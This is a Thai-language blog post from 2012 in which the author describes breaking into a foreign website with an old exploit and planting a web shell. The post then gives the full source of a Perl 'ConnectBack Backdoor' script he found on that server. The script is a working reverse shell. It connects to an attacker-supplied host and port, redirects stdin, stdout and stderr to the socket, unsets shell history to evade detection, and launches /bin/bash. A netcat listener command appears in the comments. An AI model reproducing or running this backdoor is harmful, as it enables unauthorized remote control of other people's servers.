หน้าเว็บ

วันอาทิตย์ที่ 12 กุมภาพันธ์ พ.ศ. 2555

Back Connect [ Perl ]          เรื่องมีอยู่ว่าผมไปซนเว็บต่างประเทศมาเว็บนึงจาก Exploit เดิมๆนั้นแหละ ไม่ขอเอ่ยว่า Exploit ไหน เว็บอะไรนะครับ ซนเข้าไปวาง Shell ได้แล้วก็สำรวจเครื่องดูเจอไฟล์ .pl แปลกๆเลยใช้บอทอ่านไฟล์ .pl นั้นดู ปรากฏว่าเป็น Back Connect ครับ สันนิฐานได้ว่าโดนเจาะมาก่อนผมแล้ว เลยเอาโค้ด Back Connect มาแปะไว้ที่บลอกดีกว่า ความจริงโค้ดชุดนี้ก็หาได้ตาม Google ทั่วไป ^^

#!/usr/bin/perl
use IO::Socket;
#Sleepwalker Connect Back Shell                     
#--== ConnectBack Backdoor Shell vs 1.0 by SW ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by SW ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by SW ==--
$system = '/bin/bash';
$ARGC=@ARGV; 
print "--== ConnectBack Backdoor Shell vs 1.0 by SW ==-- \n\n"; 
if ($ARGC!=2) { 
  print "Usage: $0 [Host] [Port] \n\n"; 
  die "Ex: $0 127.0.0.1 2121 \n"; 
} 
use Socket; 
use FileHandle; 
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n"; 
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush(); 
open(STDIN, ">&SOCKET"); 
open(STDOUT,">&SOCKET"); 
open(STDERR,">&SOCKET"); 
print "--== ConnectBack Backdoor vs 1.0 by SW ==-- \n\n"; 
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 
system($system);
#EOF

ส่วนวิธีใช้คงไม่ต้องบอกนะครับ :P

ไม่มีความคิดเห็น:

แสดงความคิดเห็น